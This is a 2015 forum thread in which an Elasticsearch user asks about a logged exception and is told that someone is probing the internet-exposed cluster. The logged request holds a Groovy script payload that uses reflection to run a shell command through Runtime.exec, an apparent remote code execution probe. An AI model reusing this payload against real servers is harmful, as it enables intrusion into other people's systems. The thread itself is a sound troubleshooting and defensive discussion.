Elasticsearch Logs this exception

Kiran_Sriharsha · September 10, 2015, 6:52am

Hi

We are using ES and River-mongodb. Both versions are old (1.1.1 and 2.0.2). We will update them soon.

Can someone explain this below log message.

[2015-09-10 05:25:01,017][DEBUG][action.search.type ] [elasticsearch] [idx][1], node[k5EEcS5Q262rDOJr0vKpg], [R], s[STARTED]: Failed to execute [org.elasticsearch.action.search.SearchRequest@f8e78ea] lastShard [true]

org.elasticsearch.search.SearchParseException: [idx][1]: from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName("java.io.BufferedReader").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName("java.io.InputStreamReader").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("echo qq952135763").getInputStream())).readLines()","lang": "groovy"}}}]]

Thanks
Sri Harsha

warkolm · September 10, 2015, 6:55am

Is your ES open to the internet?
Cause it looks like it is and someone is trying to break in.

Kiran_Sriharsha · September 10, 2015, 3:41pm

Yes. It was open to the world when this exception got logged.

warkolm · September 10, 2015, 10:30pm

Then that's what the exception is, someone trying to run something bad on your cluster.